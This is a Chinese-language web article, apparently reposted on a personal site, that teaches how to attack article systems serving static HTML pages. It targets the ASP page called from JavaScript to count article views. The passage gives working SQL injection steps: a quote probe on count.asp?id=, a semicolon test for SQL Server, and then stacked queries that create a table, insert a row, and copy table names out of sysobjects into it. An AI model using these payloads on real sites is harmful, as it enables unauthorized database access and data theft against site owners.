⊕ 网站首页 ⊕注册会员 ⊕ 本站免费电影 ⊕ 留言板 ⊕ 繁體中文
提升15% MySQL 5.1正式版微软确认年底发布SQL 20QQ会员优先体验QQLive 6MySQL管理工具SQLyog最新SQL Server 2008将“纸”全新体验 QQLive 5.0.3新版QQLive 5开始小范围QQ直播网页改版 QQLive3过滤不良信息 QQLive3.3用QQLeU轻松扩大你的QQ交
大家在是否碰到过这样的站点: 全站文章系统采用FSO静态生成的HTML文件来显示。这样做的好处一来可以减轻服务器负担,提高访问速度。二来也阻止了SQL注入式的攻击。。 我来说说他们的文章系统原理:全部文章均在数据库存有一个副本。另处根据模板生成一个HTML页面。 攻击方法: 查看源文件/看里面是否有通过JS来调用的页面。 如调用来更新文章的浏览次数。 我们就可以这样来试一下可否注入: http://服务器域名/count.asp?id=1552’ 看一下是否出错。如出错说明有注入漏洞。然后正常攻击。 在本机建立一下post.htm的文件和log.txt的文本文件(用来记录用,这是一个好习惯) post.htm内容:主要是方便输入。 对于SQLSERVER的服务器可以这样判断:在1552后加一分号,如正常有可能是SQLSERVER 对于这类数据库可以先建一个表id=1552;create table aaa(aaa char(20));-- 然后插入一条记录:id=1552;insert into aaa values(’test’);-- 再之后枚举出他的数据表名: id=1552;update aaa set aaa=(select top 1 name from sysobjects where xtype=’u’ and status>0);-- 这是将第一个表名更新到aaa的字段处。
【责任编辑 王凡】
| 设为首页 | 加入收藏 | 联系站长 | 友情链接 | 版权申明 | 网站公告 | 管理登录 |
Copyright © 2007 - 2009 chenpeng123.com All Rights Reserved 本站所有文章,软件等均来自网络收集,不代表本站观点,仅供学习和研究使用。如有侵犯您的版权,请联系我们,本站将立即删除。 鲁ICP备07014697号 你是本站第 位访客